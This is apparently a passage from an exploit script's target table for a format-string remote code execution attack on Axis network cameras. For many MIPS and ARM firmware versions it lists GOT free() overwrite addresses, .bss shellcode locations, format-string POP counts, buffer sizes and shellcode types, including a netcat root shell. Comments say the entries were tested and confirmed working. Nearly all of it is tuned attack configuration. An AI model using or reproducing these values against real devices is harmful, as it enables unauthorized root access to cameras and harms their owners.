0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.55x': [
0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
11, # 1st POP's
9, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.6x': [
0x41d048, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.7x': [
0x41d04c, # Adjust to GOT free() address
0x41f718, # .bss shellcode address
2, # 1st POP's
14, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.75x': [
0x41c498, # Adjust to GOT free() address
0x41daf0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.8x': [
0x41d0c0, # Adjust to GOT free() address
0x41e740, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.9x': [
0x41d0c0, # Adjust to GOT free() address
0x41e750, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.1x': [
0x41c480, # Adjust to GOT free() address
0x41dac0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.2x': [
0x41e578, # Adjust to GOT free() address
0x41fae0, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.20x': [
0x41d0c4, # Adjust to GOT free() address
0x41e700, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.3x': [
0x41e4cc, # Adjust to GOT free() address
0x420a78, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.1x': [
0x41e268, # Adjust to GOT free() address
0x420818, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
#
# Tested with execstack to set executable stack flag bit on bin's and lib's
#
# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.
#
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.50x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1e7c8, # .bss shellcode address
93, # 1st POP's
1, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.55x': [ #
0x1c15c, # Adjust to GOT free() address
0x1e834, # .bss shellcode address
59, # 1st POP's
80, # 2nd POP's
'axis', # Aligns injected code
800, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
#
# Using direct parameter access format string, AKA 'New Style'
#
# MPQT
'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root)
0x1c1b4, # Adjust to GOT free() address
0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.2x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.4x': [ #
0x1c1b4, # Adjust to GOT free() address
0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'ARM-NCSH-5.5x': [ #
0x1c15c, # Adjust to GOT free() address
0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.6x': [ #
0x1c15c, # Adjust to GOT free() address
0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.7x': [ #
0x1c1c0, # Adjust to GOT free() address
0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
132, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# Will go in endless loop after exit of nc shell... DoS sux
# MPQT
'ARM-NCSH-5.8x': [ #
0x1b39c, # Adjust to GOT free() address
0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
98, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-6.1x': [ #
0x1d2a4, # Adjust to GOT free() address
# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
106, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],